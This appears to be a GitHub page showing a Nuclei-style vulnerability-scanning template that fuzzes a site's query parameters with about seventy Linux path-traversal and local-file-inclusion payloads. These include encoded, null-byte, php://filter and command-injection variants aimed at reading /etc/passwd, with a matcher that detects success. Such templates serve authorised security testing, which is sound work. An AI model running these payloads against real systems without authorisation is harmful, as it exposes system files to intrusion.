-
Notifications
You must be signed in to change notification settings - Fork 6
/
Copy pathlfi-linux-fuzz.yaml
98 lines (93 loc) · 4.25 KB
/
lfi-linux-fuzz.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
id: linux-lfi-fuzz
info:
name: Local File Inclusion - Linux
author: DhiyaneshDK
severity: high
reference:
- https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Directory%20Traversal/Intruder/directory_traversal.txt
- https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion
tags: lfi,dast,linux
requests:
- method: GET
path:
- '{{BaseURL}}'
payloads:
nix_fuzz:
- '/etc/passwd'
- '../../etc/passwd'
- '../../../etc/passwd'
- '/../../../../etc/passwd'
- '../../../../../../../../../etc/passwd'
- '../../../../../../../../etc/passwd'
- '../../../../../../../etc/passwd'
- '../../../../../../etc/passwd'
- '../../../../../etc/passwd'
- '../../../../etc/passwd'
- '../../../etc/passwd'
- '../../../etc/passwd%00'
- '../../../../../../../../../../../../etc/passwd%00'
- '../../../../../../../../../../../../etc/passwd'
- '/../../../../../../../../../../etc/passwd^^'
- '/../../../../../../../../../../etc/passwd'
- '/./././././././././././etc/passwd'
- '/..\../..\../..\../..\../..\../..\../etc/passwd'
- '.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd'
- '%252e%252e%252fetc%252fpasswd'
- '%252e%252e%252fetc%252fpasswd%00'
- '%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd'
- '%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd%00'
- '....//....//etc/passwd'
- '..///////..////..//////etc/passwd'
- '/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd'
- '%0a/bin/cat%20/etc/passwd'
- '%00/etc/passwd%00'
- '%00../../../../../../etc/passwd'
- '/../../../../../../../../../../../etc/passwd%00.jpg'
- '/../../../../../../../../../../../etc/passwd%00.html'
- '/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd'
- '/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
- '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
- '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
- '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
- '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
- '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd'
- '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd'
- '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd'
- '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd'
- '//....//....//....//....//....//....//....//....//....//etc/passwd'
- '/path/..\\..\\\..\\\..\\\/etc/passwd'
- '..%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd'
- 'Li4lMkYuLiUyRi4uJTJGLi4lMkYuLiUyRi4uJTJGLi4lMkZldGMuLiUyRnBhc3N3ZC4uJTJGMDAudHh0Ly8uJTAw'
- '..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd'
- '..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd'
- '..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00'
- '..//..//..//..//..//etc/passwd'
- '....//....//....//....//etc/passwd'
- '....//....//....//....//....//....//etc/passwd'
- '../../../../../../../../../../../../../../etc/passwd'
- '..\/..\/..\/..\/etc/passwd'
- '..%2F..%2F..%2F..%2Fetc/passwd'
- '..%5C..%5C..%5C..%5cetc/passwd'
- '..%252f..%252f..%252f..%252fetc/passwd'
- '/etc/passwd&'
- '/etc/passwd%00'
- '/etc/passwd%00.inc'
- '/etc/passwd%00.php'
- 'file:%2F%2F%2Fetc%2Fpasswd'
- 'file:%252F%252F%252Fetc%252Fpasswd'
- 'file%3A///etc/passwd'
- 'file%2A%2F%2F%2Fetc%2Fpasswd'
- 'file%2A%252F%252F%252Fetc%252Fpasswd'
- 'php://filter/resource=/etc/passwd'
fuzzing:
- part: query
type: replace # replaces existing parameter value with fuzz payload
mode: multiple # replaces all parameters value with fuzz payload
fuzz:
- '{{nix_fuzz}}'
stop-at-first-match: true
matchers:
- type: regex
part: body
regex:
- 'root:.*:0:0:'